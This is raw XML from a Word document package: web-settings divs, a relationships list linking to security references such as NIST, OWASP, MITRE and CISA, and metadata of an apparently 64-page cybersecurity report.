      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1951280096">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960182246">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964264478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1976177863">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1977296037">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2033606922">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058968576">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2064712951">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2084136056">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2133475612">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2133862787">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2136217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63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaspersky.com/blog/unitedhealth-ransomware-attack/53065/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fidoalliance.org/fido2/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-115/final" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/controls/cis-controls-list" TargetMode="External"/><Relationship Id="rId92"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image" Target="media/image59.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://howtofix.guide/ransomware-operators-use-cobalt-strike/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gartner.com/en/documents/endpoint-detection-response" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.verizon.com/business/resources/reports/dbir/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/798.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.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7.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:2%350%33%37%39%39@s%74ud%65nt%2e%75%77%74%73d%2e%61%63%2eu%6b" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/standards/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/reports/data-breach" TargetMode="External"/><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image" Target="media/image60.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hyperlink" Target="https://www.cisa.gov/zero-trust-maturity-model" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/secrets-manager/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hhs.gov/hipaa/for-professionals/security/index.html" TargetMode="External"/><Relationship Id="rId9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73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0016/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.knowbe4.com/phishing-by-industry-benchmarking-report" TargetMode="Externa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30350</TotalTime>
  <Pages>64</Pages>
  <Words>8167</Words>
  <Characters>46554</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>387</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ACER</cp:lastModifiedBy>
  <cp:revision>205</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-23T18:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-12T22:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>